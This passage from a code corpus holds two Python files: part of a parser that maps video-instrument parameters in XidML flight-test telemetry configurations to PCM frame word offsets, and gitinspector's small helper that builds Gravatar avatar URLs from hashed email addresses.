p} # create a dict so I can figure out the parents and gps except: raise IOError("Failed to parse {}".format(xidml)) self.xidml = xidml self.xidmlVersion = self.root.attrib["Version"] self._findAllModules() self._findAllParameters() self._findAllPCMPackages() self._pruneUnusedVids() self._numberOfVids() self._preCalcParams() def _numberOfVids(self): '''Calculate how many separate VID instruments have parameters''' for vid,params in self.vids.iteritems(): numberOfParams = len(params) if numberOfParams > 0: self.vidsPerXidml.append(vid) def _preCalcParams(self): '''This function creates a dict per vid with a list of indices for a word buffer This allows me to take a list of words and convert to a buffer''' self._vidsCache = dict() for vid,params in self.vids.items(): numberOfParams = len(params) self._vidsCache[vid] = dict() for p_index,param in enumerate(natural_sort(params)): for wd_index,word_offset in enumerate(params[param]): # This works out the location within the PCM frame of every video word and caches it self._vidsCache[vid][(wd_index*numberOfParams)+p_index] = word_offset if self._maxWordOffset < word_offset: self._maxWordOffset = word_offset def frameToBuffers(self,listofwords): '''Takes a buffer containing a major frame and returns a list of buffers of MPEG_TS :type listofwords: list(str) ''' vid_bufs = {} #print "DEBUG: list of words len = {}".format(len(listofwords)) if self._maxWordOffset > len(listofwords): raise ValueError ("List of words not long enough .Are you using the correct xidml source file?") for vid in self.vids: vid_bufs[vid] = "" for vid,params in self.vids.items(): # Now convert the dict back into string buffers for idx in sorted(self._vidsCache[vid]): vid_bufs[vid] += struct.pack('>H',listofwords[self._vidsCache[vid][idx]]) return vid_bufs def _findAllModules(self): '''Find all the video instruments in the xidml both 2.4 and 3.0''' allModules = self.root.findall(".//PartReference") for module in allModules: if module.text in self.vidInstruments: try: mygp = self.parent_map[self.parent_map[module]] vidname = mygp.attrib["Name"] self.vids[vidname] = dict() # dict will contain the parameters + locations except: raise Exception("Failed to get parent module of {}".format(module.text)) def _findAllParameters(self): '''Find all the parameters of interest connected to the video instruments''' allParameters = self.root.findall(".//Parameter") if self.xidmlVersion == "2.41": for parameter in allParameters: source_instrument = parameter.find("Source/Signal/InstrumentReference") if source_instrument != None: if source_instrument.text in self.vids: if re.search(self._parameterOfInterestRE,parameter.attrib["Name"]): # Build up a dict containing each instrument, each parameter and a list of the word offsets self.vids[source_instrument.text][parameter.attrib["Name"]] = list() self._allVidParams[parameter.attrib["Name"]] = source_instrument.text else: allParameterReferences = self.root.findall(".//Parameters/ParameterReference") for parameterreference in allParameterReferences: try: mygp = self.parent_map[self.parent_map[parameterreference]] source_instrument = mygp.attrib["Name"] except: raise Exception("Failed to get parent of {}".format(parameterreference.text)) if source_instrument != None: if source_instrument in self.vids: if re.search(self._parameterReferenceVendorOfInterestRE, parameterreference.attrib["VendorName"]): self.vids[source_instrument][parameterreference.text] = list() self._allVidParams[parameterreference.text] = source_instrument def _findAllPCMPackages(self): '''Find all the parameters of interest connected to the video instruments''' if self.xidmlVersion == "2.41": allPCMPackages= self.root.findall("Packages/PackageSet/X-IRIG-106-Ch-4-1.2") for package in allPCMPackages: bitsPerFrame = int(package.findtext("Properties/MajorFrameProperties/BitsPerMinorFrame")) minorFramesPerMajorFrames = int(package.findtext("Properties/MajorFrameProperties/MinorFramesPerMajorFrame")) for param in package.findall("Content/Parameter"): pname = param.attrib["Name"] if pname in self._allVidParams: # Some testing of supported structures if int(param.findtext("NumberOfDataBits")) != 16: raise Exception("Video parameters of 1 word supported only") if int(param.findtext("Location/MinorFrameNumber")) != 1: raise Exception("Currently only support 1 minor frame") # We have to handle the offset and then get a word index #Occurrances seem o be ber major frame so divide to get occurrances per minor frame if param.findtext("Location/Occurrences"): poccurrances = int(param.findtext("Location/Occurrences")) / minorFramesPerMajorFrames else: poccurrances = 1 # Databits in words if param.findtext("NumberOfDataBits"): dbits = int(param.findtext("NumberOfDataBits")) else: dbits = self.dataBitsPerWord firstWordOffset = int(param.findtext("Location/Offset_Bits"))/dbits offsetWordInterval = bitsPerFrame / (poccurrances * dbits) # If there are multiple instances of the word in a frame then they are equally spaced in the fram # record the word offset per parameter in an array for offset in range(poccurrances): self.vids[self._allVidParams[pname]][pname].append(firstWordOffset+(offsetWordInterval*offset)) else: allPCMPackages= self.root.findall("Packages/PackageSet/IRIG-106-Ch-4") for package in allPCMPackages: bitsPerFrame = int(package.findtext("Properties/MajorFrameProperties/BitsPerMinorFrame")) dbits = int(package.findtext("Properties/MajorFrameProperties/DefaultDataBitsPerWord")) minorframeoffset = int(package.findtext("Properties/SynchronizationStrategy/SubframeSynchronizationStrategy/SFID/MinorFrameOffset_Words")) for mapping in package.findall("Content/Mapping"): pref = mapping.findtext("ParameterReference") if pref in self._allVidParams: if int(mapping.findtext("Location/MinorFrameNumber")) != 1: raise Exception("Currently only support 1 minor frame") if mapping.findtext("Location/Occurrences"): poccurrances = int(mapping.findtext("Location/Occurrences")) else: poccurrances = 1 # Databits in words firstWordOffset = int(mapping.findtext("Location/Offset_Words")) (remainder, offsetWordInterval) = math.modf(float(bitsPerFrame) / (poccurrances * dbits)) logging.warning("Illegal xidml frame. I can only guess the frame structure based on the xidml") # DASStudio generates invalid frames at time and this is the workaround roundUpEveryXOccurances = int(math.ceil(1/remainder)) offsetWordInterval = int(offsetWordInterval) # If there are multiple instances of the word in a frame then they are equally spaced in the fram # record the word offset per parameter in an array addOffsetIllegalFrame = 0 for offset in range(poccurrances): self.vids[self._allVidParams[pref]][pref].append(addOffsetIllegalFrame+minorframeoffset+firstWordOffset+(offsetWordInterval*offset)) if offset % offsetWordInterval == (offsetWordInterval-1): addOffsetIllegalFrame += 1 def _pruneUnusedVids(self): vidIsUnused = dict() for vid,params in self.vids.iteritems(): vidIsUnused[vid] = True for location in params: if len(self.vids[vid][location]) > 0: vidIsUnused[vid] = False for vid in vidIsUnused: if vidIsUnused[vid] == True: del self.vids[vid]
gpl-2.0
natpen/gitinspector
gitinspector/gravatar.py
47
1278
# coding: utf-8 # # Copyright © 2013 Ejwa Software. All rights reserved. # # This file is part of gitinspector. # # gitinspector is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # gitinspector is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with gitinspector. If not, see <http://www.gnu.org/licenses/>. from __future__ import unicode_literals try: from urllib.parse import urlencode except: from urllib import urlencode import format import hashlib def get_url(email, size=20): md5hash = hashlib.md5(email.encode("utf-8").lower().strip()).hexdigest() base_url = "https://www.gravatar.com/avatar/" + md5hash params = None if format.get_selected() == "html": params = {"default": "identicon", "size": size} elif format.get_selected() == "xml": params = {"default": "identicon"} return base_url + "?" + urlencode(params)
gpl-3.0